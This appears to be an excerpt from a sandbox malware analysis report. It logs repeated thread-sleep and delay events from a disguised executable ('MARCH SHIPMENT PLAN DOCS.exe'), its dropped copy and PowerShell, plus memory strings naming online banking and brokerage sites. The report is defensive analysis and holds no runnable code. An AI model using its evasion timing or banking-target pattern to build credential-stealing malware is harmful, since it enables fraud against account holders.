Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595922
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595804
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594578

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5904	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8496	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Window / User API: threadDelayed 1493	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Window / User API: threadDelayed 8361	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Window / User API: threadDelayed 1603
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Window / User API: threadDelayed 8256

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 5368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592	Thread sleep count: 5904 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep count: 147 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100	Thread sleep count: 1493 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100	Thread sleep count: 8361 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596543s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -594641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 7408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776	Thread sleep count: 1603 > 30
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776	Thread sleep count: 8256 > 30
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599779s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599666s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599435s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598342s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597905s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -597030s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596469s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596359s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596140s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595804s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595125s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428	Thread sleep time: -594578s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597451	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596543	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596436	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599666
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599435
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598342
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597030
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595922
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595804
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 594578

Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
